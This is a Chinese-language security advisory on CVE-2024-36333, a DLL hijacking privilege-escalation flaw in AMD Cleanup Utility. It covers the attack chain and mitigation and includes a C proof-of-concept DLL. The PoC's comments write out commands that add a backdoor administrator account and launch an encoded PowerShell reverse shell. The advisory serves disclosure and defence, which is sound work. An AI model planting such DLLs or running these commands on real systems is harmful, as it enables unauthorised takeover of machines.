CVE-2024-36333 CVSS 7.8 高危

CVE-2024-36333 AMD清理工具DLL劫持漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-36333

漏洞类型

DLL劫持

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AMD Cleanup Utility

漏洞概述

AMD清理工具中存在DLL劫持安全漏洞，攻击者可利用此缺陷在本地系统中实现权限提升。由于该工具在加载特定动态链接库时未能正确指定完整路径或验证文件完整性，低权限攻击者可将恶意DLL文件放置于程序搜索路径中。当工具以较高权限运行时，恶意代码将被加载执行，导致系统面临任意代码执行的风险，严重影响机密性、完整性和可用性。

技术细节

该漏洞的根源在于Windows应用程序加载动态链接库（DLL）时的搜索顺序机制。AMD清理工具在执行过程中尝试加载特定的DLL文件，但未使用绝对路径或安全目录限制。根据Windows的DLL搜索顺序，如果程序未指定完整路径，系统会优先在应用程序所在目录、当前工作目录等可能被用户控制的路径下查找。攻击者利用这一逻辑缺陷，将包含恶意Payload的DLL文件重命名为目标DLL的名称，并将其放置在AMD清理工具的运行目录中。由于该清理工具通常以SYSTEM或管理员权限运行以完成驱动清理任务，当工具启动并尝试加载该DLL时，恶意代码会自动被执行。这种劫持行为允许攻击者绕过UAC限制，继承高权限进程的上下文，从而执行任意系统命令、安装持久化后门或窃取敏感数据，实现对受损系统的完全控制。

攻击链分析

STEP 1

步骤1：侦察

攻击者确认目标系统上安装了存在漏洞的AMD清理工具，并确定其运行时加载的DLL名称及搜索路径。

STEP 2

步骤2：制作恶意载荷

攻击者编写包含恶意代码的DLL文件，并将其重命名为目标工具期望加载的DLL文件名。

STEP 3

步骤3：放置恶意文件

攻击者将恶意DLL文件放置在AMD清理工具的当前工作目录或应用程序目录中（通常需要低权限写入权限）。

STEP 4

步骤4：触发漏洞

诱导用户或通过计划任务触发AMD清理工具的运行。

STEP 5

步骤5：代码执行

工具启动时以高权限加载恶意DLL，执行攻击者预设的代码，实现权限提升和系统控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

// PoC for DLL Hijacking vulnerability
// Compile this code as a shared library (DLL) and rename it to the vulnerable DLL expected by the application.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Code runs when the DLL is loaded into the process
        // Example: Execute a calculator to demonstrate arbitrary code execution
        system("calc.exe");
        
        // In a real attack scenario, this could be:
        // system("cmd.exe /c net user attacker P@ssw0rd /add");
        // system("cmd.exe /c net localgroup administrators attacker /add");
        
        // Or reverse shell via PowerShell
        // system("powershell -e <Base64EncodedPayload>");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

影响范围

AMD Cleanup Utility (具体受影响版本请参考官方公告 AMD-SB-6027)

防御指南

临时缓解措施

临时缓解措施包括限制低权限用户对AMD清理工具安装目录及其子目录的写入权限，确保攻击者无法在该位置替换或放置恶意DLL文件。同时，仅在必要时以管理员权限运行该工具。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表